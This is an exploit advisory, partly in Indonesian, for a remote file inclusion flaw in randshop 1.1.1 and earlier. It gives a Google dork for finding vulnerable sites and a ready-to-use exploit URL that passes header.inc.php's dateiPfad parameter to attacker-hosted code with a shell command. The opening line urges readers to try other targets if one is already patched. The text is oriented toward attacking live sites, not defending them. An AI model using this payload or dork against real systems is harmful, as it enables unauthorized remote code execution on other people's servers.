Bug ini bekerja pada versi 1.1.1 kebawah, jadi bila terdapat error mungkin udah di patch oleh admin, jadi coba cari target laen. --------------------------------------------------------------------------- randshop <= 1.1.1 Remote File Inclusion Vulnerability --------------------------------------------------------------------------- dork : "software 2004-2005 by randshop" Discovered By OLiBekaS : http://bekas.6te.net/vuln/rand.txt : Remote : Yes Critical Level : Dangerous --------------------------------------------------------------------------- Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : randshop version : 1.1.1 URL : http://www.randshop.com/ ------------------------------------------------------------------ Exploit: ~~~~~~~~ Variable $dateiPfad Example: http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls ------------------------------------------------------------------ Solution : ~~~~~~~~~~ update ke versi yang lebih tinggi ------------------------------------------------------------------ */ Contact: ~~~~~~~~ Nick: OLiBekaS E-mail: olibekas[at]gmail[dot]com Homepage: hTTp://bekas.6te.net /* -------------------------------- [ EOF] ----------------------------------